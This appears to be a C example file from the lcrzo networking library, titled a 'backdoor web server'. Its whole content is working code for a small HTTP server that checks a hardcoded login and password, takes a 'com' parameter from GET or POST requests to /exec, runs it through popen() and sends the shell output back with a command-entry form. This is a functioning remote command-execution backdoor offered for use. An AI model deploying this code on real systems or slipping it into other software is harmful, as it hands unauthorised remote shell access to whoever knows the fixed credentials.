
/* include the library headers */
#include <lcrzo.h>
#include "lcrzoex.h"
#include "shared/shared_misc.h"
#include "shared/shared_http.h"

/*-------------------------------------------------------------*/
/* set information about this example */
lcrzoex_infos lcrzoex_000260=
{ /*reference*/     "lcrzoex", 260,
  /*version*/       1, 0,
  /*title*/         "backboor web server (local ip)",
  /*french title*/  "server web backdoor (ip locale)",
  /*description*/   "",
  /*french desc.*/  "",
  /*usage*/         "server_name server_port",
  /*french usage*/  "nom_serveur port_serveur",
  /*usage example*/ "1.2.3.4 5566",
  /*fr. usage ex.*/ "1.2.3.4 5566",
  /*author*/        "Laurent"
};

/*-------------------------------------------------------------*/
/* function declarations */
int lcrzoex_000260_main(int argc, char *argv[]);
int lcrzoex_000260_server(lcrzo_sock sock, void *pinfos);
int lcrzoex_000260_badcred(lcrzo_sock *psock);
int lcrzoex_000260_goodcred(lcrzo_sock *psock,
			    lcrzo_conststring method,
			    lcrzo_conststring url,
			    lcrzo_constdata body,
			    lcrzo_int32 bodysize);
int lcrzoex_000260_exec(lcrzo_sock *psock, 
			lcrzo_conststring command);


/*-------------------------------------------------------------*/
/* login and password : you may change them */
#define LCRZOEX_000260_LOGIN    "lcrzoex"
#define LCRZOEX_000260_PASSWORD "lcrzoex"

/*-------------------------------------------------------------*/
/* timeout for reading from socket, in seconds */
#define LCRZOEX_000260_TIMEOUT_HEADER 10
#define LCRZOEX_000260_TIMEOUT_BODY   30


/*-------------------------------------------------------------*/
/* main function : you can rename it to "main", and then this file
   can be compiled alone. */
int lcrzoex_000260_main(int argc, char *argv[])
{ lcrzo_ipl serveripl;
  lcrzo_uint16 serverport;

  if ( argc<3 )
  { /* print usage */
    lcrzo_epr(lcrzoex_infos_print(lcrzoex_000260, argv[0]));
    return(LCRZO_ERR_BULCRZOEXBADUSAGE);
  }

  /* initialize IP address */
  lcrzo_epr(lcrzo_ipl_init_hs(argv[1], &serveripl));

  /* initialize port numbers */
  lcrzo_epr(lcrzo_uint16_init_text(argv[2], &serverport));

  /* initialize the socket */
  lcrzo_epr(lcrzo_sock_tcpmulser_real2(serveripl, serverport, NULL, 0,
				       &lcrzoex_000260_server, NULL));

  return(LCRZO_ERR_OK);
}

/*-------------------------------------------------------------*/
int lcrzoex_000260_server(lcrzo_sock sock, void *pinfos)
{ lcrzo_data body;
  lcrzo_int32 bodysize, contentlength;
  lcrzo_string method, url, sitelogin, sitepasswd;

  /* Note : this server is not KeepAlive */

  /* read header */
  lcrzo_epr(shared_misc_rearmtimer(LCRZOEX_000260_TIMEOUT_HEADER));
  lcrzo_epr(shared_http_request_readheader(&sock, &method, &url,
					   NULL, NULL, NULL, NULL, NULL,
					   &sitelogin, &sitepasswd,
					   &contentlength, NULL, NULL));
  lcrzo_epr(shared_misc_rearmtimer(0));

  /* print the read header */
  /*lcrzo_epr(lcrzo_data_print(header, headersize, LCRZO_PRINTTYPE_DUMP));*/

  /* read body */
  lcrzo_epr(shared_misc_rearmtimer(LCRZOEX_000260_TIMEOUT_BODY));
  lcrzo_er(shared_http_response_readbody(&sock, contentlength,
					 &body, &bodysize));
  lcrzo_epr(shared_misc_rearmtimer(0));

  if ( !strcmp(method, "POST") && contentlength )
  { /* As said in rfc 2068, there is a bug in some clients :
       RFC 2068 : 4.1 Message Types
       Note: certain buggy HTTP/1.0 client implementations generate an
       extra CRLF's after a POST request. To restate what is explicitly
       forbidden by the BNF, an HTTP/1.1 client must not preface or follow
       a request with an extra CRLF.
    */
    /* we eventually read exceeding bytes (ignore error : OK or TEMPDATAEND) */
    lcrzo_sock_readm(&sock, LCRZO_FALSE, NULL, NULL);
  }

  /* treat */
  if ( !strcmp(sitelogin, LCRZOEX_000260_LOGIN) &&
       !strcmp(sitepasswd, LCRZOEX_000260_PASSWORD) )
  { /* good credentials */ 
    lcrzo_epr(lcrzoex_000260_goodcred(&sock, method, url, body, bodysize));
  }
  else
  { /* good credentials */ 
    lcrzo_epr(lcrzoex_000260_badcred(&sock));
  }
  
  /* free memory */
  lcrzo_data_free(body);
  lcrzo_string_free(method);
  lcrzo_string_free(url);
  lcrzo_string_free(sitelogin);
  lcrzo_string_free(sitepasswd);

  return(LCRZO_ERR_OK);
  pinfos=pinfos; /*just for the compiler warning*/
}

/*-------------------------------------------------------------*/
int lcrzoex_000260_badcred(lcrzo_sock *psock)
{ int language;
  lcrzo_data data;
  lcrzo_int32 datasize;

  /* get language for messages */
  lcrzo_epr(lcrzo_global_get_language(&language));

  lcrzo_epr(shared_http_initm_httpvererr("1.0", 401, 
					 (language==LCRZO_GLOBAL_LANG_FR)?
					 "Vous devez vous authentifier":
					 "Authorization Required",
					 &data, &datasize));
  lcrzo_epr(shared_http_appendm_connection(NULL, datasize, &data, &datasize));
  lcrzo_epr(shared_http_appendm_contenttype(NULL, datasize, &data, &datasize));
  lcrzo_epr(shared_http_appendm_wwwauth((language==LCRZO_GLOBAL_LANG_FR)?
					"Acces web a lcrzoex 260":
					"Lcrzoex 260 web access",
					datasize, &data, &datasize));
  lcrzo_epr(lcrzo_data_appendm_text("\r\n", datasize, &data, &datasize));

  lcrzo_epr(lcrzo_data_appendm_text("<HTML><BODY>\n", datasize,
				    &data, &datasize));
  if ( language==LCRZO_GLOBAL_LANG_FR)
  { lcrzo_epr(lcrzo_data_appendm_text(
              "Entrez le login/password de lcrzoex_000260.c\n",
				      datasize, &data, &datasize));
  }
  else
  { lcrzo_epr(lcrzo_data_appendm_text(
              "Enter login/password from lcrzoex_000260.c\n", 
				      datasize, &data, &datasize));
  }
  lcrzo_epr(lcrzo_data_appendm_text("</BODY></HTML>\n", datasize, 
				    &data, &datasize));

  lcrzo_epr(lcrzo_sock_write(psock, data, datasize));
  lcrzo_string_free(data);
  return(LCRZO_ERR_OK);
}

/*-------------------------------------------------------------*/
int lcrzoex_000260_goodcred(lcrzo_sock *psock,
			    lcrzo_conststring method,
			    lcrzo_conststring url,
			    lcrzo_constdata body,
			    lcrzo_int32 bodysize)
{ int language;
  lcrzo_data data;
  lcrzo_int32 datasize;
  lcrzo_string command;

  /* get language for messages */
  lcrzo_epr(lcrzo_global_get_language(&language));

  /* verify the method */
  if ( strcmp(method, "GET") && strcmp(method, "POST") )
  { lcrzo_epr(shared_http_initm_httpvererr("1.0", 200, "OK", &data,&datasize));
    lcrzo_epr(shared_http_appendm_connection(NULL, datasize, &data,&datasize));
    lcrzo_epr(shared_http_appendm_contenttype(NULL, datasize,&data,&datasize));
    lcrzo_epr(lcrzo_data_appendm_text("\r\n", datasize, &data, &datasize));
    lcrzo_epr(lcrzo_data_appendm_text("<HTML><BODY>\n", datasize,
				      &data, &datasize));
    if ( language==LCRZO_GLOBAL_LANG_FR)
    { lcrzo_epr(lcrzo_data_appendm_text("Bienvenue.<BR>\n", datasize, 
					&data, &datasize));
    }
    else
    { lcrzo_epr(lcrzo_data_appendm_text("Welcome.<BR>\n", datasize,
					&data, &datasize));
    }
    lcrzo_epr(lcrzo_data_appendm_text("</BODY></HTML>\n", datasize,
				      &data, &datasize));
    if ( language==LCRZO_GLOBAL_LANG_FR)
    { lcrzo_epr(lcrzo_data_appendm_text("Seules les methodes GET et POST\n", 
					datasize, &data, &datasize));
      lcrzo_epr(lcrzo_data_appendm_text("sont actuellement supportees\n", 
					datasize, &data, &datasize));
      lcrzo_epr(lcrzo_data_appendm_text("dans lcrzoex_000260.c.\n", 
					datasize, &data, &datasize));
    }
    else
    { lcrzo_epr(lcrzo_data_appendm_text("Only GET and POST methods \n", 
					datasize, &data, &datasize));
      lcrzo_epr(lcrzo_data_appendm_text("are actually supported\n", 
					datasize, &data, &datasize));
      lcrzo_epr(lcrzo_data_appendm_text("in lcrzoex_000260.c.\n", 
					datasize, &data, &datasize));
    }

    lcrzo_epr(lcrzo_sock_write(psock, data, datasize));
    lcrzo_string_free(data);
    return(LCRZO_ERR_OK);
  }

  /* verify the url */
  if ( strncmp(url, "/exec", 5) &&
       strncmp(url, "/exec/", 6) &&
       strncmp(url, "/exec?", 6) )
  { lcrzo_epr(shared_http_initm_httpvererr("1.0", 200, "OK", &data,&datasize));
    lcrzo_epr(shared_http_appendm_connection(NULL, datasize, &data,&datasize));
    lcrzo_epr(shared_http_appendm_contenttype(NULL, datasize,&data,&datasize));
    lcrzo_epr(lcrzo_data_appendm_text("\r\n", datasize, &data, &datasize));
    lcrzo_epr(lcrzo_data_appendm_text("<HTML><BODY>\n", datasize,
				      &data, &datasize));
    if ( language==LCRZO_GLOBAL_LANG_FR)
    { lcrzo_epr(lcrzo_data_appendm_text("Bienvenue.<BR>\n", datasize, 
					&data, &datasize));
    }
    else
    { lcrzo_epr(lcrzo_data_appendm_text("Welcome.<BR>\n", 
					datasize, &data, &datasize));
    }
    lcrzo_epr(lcrzo_data_appendm_text("</BODY></HTML>\n", datasize,
				      &data, &datasize));
    if ( language==LCRZO_GLOBAL_LANG_FR)
    { lcrzo_epr(lcrzo_data_appendm_text("Seules l'url http://serveur/exec\n", 
					datasize, &data, &datasize));
      lcrzo_epr(lcrzo_data_appendm_text("est actuellement supportee\n", 
					datasize, &data, &datasize));
      lcrzo_epr(lcrzo_data_appendm_text("dans lcrzoex_000260.c.\n", 
					datasize, &data, &datasize));
    }
    else
    { lcrzo_epr(lcrzo_data_appendm_text("Only the url http://server/exec\n", 
					datasize, &data, &datasize));
      lcrzo_epr(lcrzo_data_appendm_text("is actually supported\n", 
					datasize, &data, &datasize));
      lcrzo_epr(lcrzo_data_appendm_text("in lcrzoex_000260.c.\n", 
					datasize, &data, &datasize));
    }

    lcrzo_epr(lcrzo_sock_write(psock, data, datasize));
    lcrzo_string_free(data);
    return(LCRZO_ERR_OK);
  }

  /* get value of posted variable */
  /* lcrzo_data_print(body, bodysize, LCRZO_PRINTTYPE_DUMP); */
  lcrzo_epr(lcrzo_string_initm_data(body, bodysize, &command));
  lcrzo_epr(shared_http_get_variablevalue(command, "com", &data, &datasize));
  lcrzo_string_free(command);
  lcrzo_epr(lcrzo_string_initm_data(data, datasize, &command));
  lcrzo_data_free(data);  

  if (strlen(command)==0)
  { lcrzo_string_free(command);
    /* get value of get variable */
    lcrzo_epr(shared_http_get_variablevalue(url, "com", &data, &datasize));
    lcrzo_epr(lcrzo_string_initm_data(data, datasize, &command));
    lcrzo_data_free(data);  
  }

  /* print the header */
  lcrzo_epr(shared_http_initm_httpvererr("1.0", 200, "OK", &data, &datasize));
  lcrzo_epr(shared_http_appendm_connection(NULL, datasize, &data, &datasize));
  lcrzo_epr(shared_http_appendm_contenttype(NULL, datasize, &data, &datasize));
  lcrzo_epr(lcrzo_data_appendm_text("\r\n", datasize, &data, &datasize));
  lcrzo_epr(lcrzo_data_appendm_text("<HTML><BODY>\n", datasize,
				    &data, &datasize));
  lcrzo_epr(lcrzo_sock_write(psock, data, datasize));
  lcrzo_data_free(data);

  /* execute the command */
  if (strlen(command))
  { /* print line */
    if ( language==LCRZO_GLOBAL_LANG_FR)
    { lcrzo_epr(lcrzo_data_initm_text("Resultat de la commande \"", 
				      &data, &datasize));
      lcrzo_epr(lcrzo_data_appendm_text(command, datasize, &data, &datasize));
      lcrzo_epr(lcrzo_data_appendm_text("\" : <BR>\n<PRE>\n", 
					datasize, &data, &datasize));
     }
    else
    { lcrzo_epr(lcrzo_data_initm_text("Result of the command \"",
				      &data, &datasize));
      lcrzo_epr(lcrzo_data_appendm_text(command, datasize, &data, &datasize));
      lcrzo_epr(lcrzo_data_appendm_text("\" : <BR>\n<PRE>\n", 
					datasize, &data, &datasize));
    }
    lcrzo_epr(lcrzo_sock_write(psock, data, datasize));
    lcrzo_data_free(data);
    /* execute the command */
    lcrzo_epr(lcrzoex_000260_exec(psock, command));
    lcrzo_epr(lcrzo_sock_write(psock, "</PRE>\n", 7));
  }
  else
  { if ( language==LCRZO_GLOBAL_LANG_FR)
    { lcrzo_epr(lcrzo_data_initm_text("Bienvenue.<BR>\n", &data, &datasize));
    }
    else
    { lcrzo_epr(lcrzo_data_initm_text("Welcome.<BR>\n", &data, &datasize));
    }
    lcrzo_epr(lcrzo_sock_write(psock, data, datasize));
    lcrzo_data_free(data);
  }
  lcrzo_string_free(command);

  /* propose the form */
  if ( language==LCRZO_GLOBAL_LANG_FR)
  { lcrzo_epr(lcrzo_data_initm_text("<BR><BR>Entrez votre commande<BR>\n", 
				    &data, &datasize));
  }
  else
  { lcrzo_epr(lcrzo_data_initm_text("<BR><BR>Enter your command<BR>\n", 
				    &data, &datasize));
  }
  lcrzo_epr(lcrzo_data_appendm_text("\n
     <FORM METHOD=POST ACTION=\"/exec\">
       <INPUT NAME=\"com\" TYPE=text SIZE=50>
       <INPUT TYPE=submit VALUE=\"entrer\">
     </FORM>", 
				    datasize, &data, &datasize));
  lcrzo_epr(lcrzo_data_appendm_text("\n", 
				    datasize, &data, &datasize));
  lcrzo_epr(lcrzo_data_appendm_text("</BODY></HTML>\n", datasize,
				    &data, &datasize));
  lcrzo_epr(lcrzo_sock_write(psock, data, datasize));
  lcrzo_data_free(data);

  return(LCRZO_ERR_OK);
}

/*-------------------------------------------------------------*/
int lcrzoex_000260_exec(lcrzo_sock *psock, 
			lcrzo_conststring command)
{ lcrzo_data data;
  lcrzo_int32 datasize;
  FILE *pf;
  int ret;

  /* execute the given command */
  pf=popen(command, "r");
  if (pf==NULL)
  { return(LCRZO_ERR_OK);
  }

  /* read all data */
  while ( lcrzo_stream_readm(pf, LCRZO_TRUE, &data, &datasize)
	  == LCRZO_ERR_OK ) 
  { lcrzo_epr(lcrzo_sock_write(psock, data, datasize));
    lcrzo_data_free(data);
  }

  /* write error code */
  ret=pclose(pf);
  lcrzo_epr(lcrzo_data_initm_text("\n\nReturn code : ", &data, &datasize));
  lcrzo_epr(lcrzo_data_appendm_int(ret, "%d", datasize, &data, &datasize));
  lcrzo_epr(lcrzo_sock_write(psock, data, datasize));
  lcrzo_epr(lcrzo_data_free(data));
 
  return(LCRZO_ERR_OK);
}
